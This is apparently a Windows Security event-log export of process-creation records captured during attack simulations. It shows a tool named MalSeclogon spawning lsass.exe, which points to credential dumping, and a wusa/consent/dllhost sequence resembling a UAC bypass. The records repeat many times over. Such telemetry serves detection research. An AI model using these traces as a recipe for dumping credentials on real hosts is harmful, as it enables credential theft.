2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 
329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" 
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + 
\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + 
C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + 
MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + 
+ + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 
+ 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" 
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + 
C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329921 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x1494 + C:\Windows\System32\lsass.exe + %%1936 + 0x27c + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + C:\Windows\System32\lsass.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329920 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x16e3db3 + 0x11e4 + C:\Windows\System32\conhost.exe + %%1936 + 0x17b8 + + S-1-0-0 + - + - + 0x0 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329919 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x17b8 + 
\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1936 + 0x27c + + S-1-0-0 + IEUser + MSEDGEWIN10 + 0x16e3db3 + C:\Windows\System32\lsass.exe + S-1-16-12288 + +" +2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329916 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x1bc4 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\services.exe + S-1-16-16384 + +" +2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329914 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x53ca2 + 0x21a4 + \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe + %%1937 + 0x2480 + + S-1-0-0 + - + - + 0x0 + C:\Windows\System32\cmd.exe + S-1-16-12288 + +" +2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 21374 + + + + + Security + wind10.winlab.local + + + + + S-1-5-20 + WIND10$ + WINLAB + 0x3e4 + 0x1dc + C:\Windows\System32\notepad.exe + %%1936 + 0xe8c + + S-1-0-0 + Administrator + WINLAB.LOCAL + 0x82215a + C:\Windows\System32\wbem\WmiPrvSE.exe + S-1-16-12288 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4688,C:\Windows\System32\conhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18208 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x8dc + C:\Windows\System32\conhost.exe + %%1936 + 0x188 + + +" 
+2019-05-11T21:10:10.904945+04:00,1557594610.904945,4688,C:\Windows\System32\cmd.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18207 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xc74 + C:\Windows\System32\cmd.exe + %%1936 + 0x4f0 + + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4688,C:\Windows\System32\wusa.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18205 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x5b0 + C:\Windows\System32\wusa.exe + %%1937 + 0x4f0 + + +" +2019-05-11T21:10:10.826820+04:00,1557594610.82682,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18204 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x27c + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.795570+04:00,1557594610.79557,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18201 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0xec8 + C:\Windows\System32\dllhost.exe + %%1936 + 0x258 + + +" +2019-05-11T21:10:10.654945+04:00,1557594610.654945,4688,C:\Windows\System32\consent.exe,IEWIN7$,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18198 + + + + + Security + IEWIN7 + + + + + S-1-5-18 + IEWIN7$ + WORKGROUP + 0x3e7 + 0x7f0 + C:\Windows\System32\consent.exe + %%1936 + 0x3c8 + + +" +2019-05-11T21:10:10.623695+04:00,1557594610.623695,4688,C:\Windows\System32\wusa.exe,IEUser,None," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18197 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x628 + C:\Windows\System32\wusa.exe + %%1938 + 0x4f0 + + +" +2019-05-11T21:10:10.608070+04:00,1557594610.60807,4688,C:\Python27\python.exe,IEUser,None," + + 
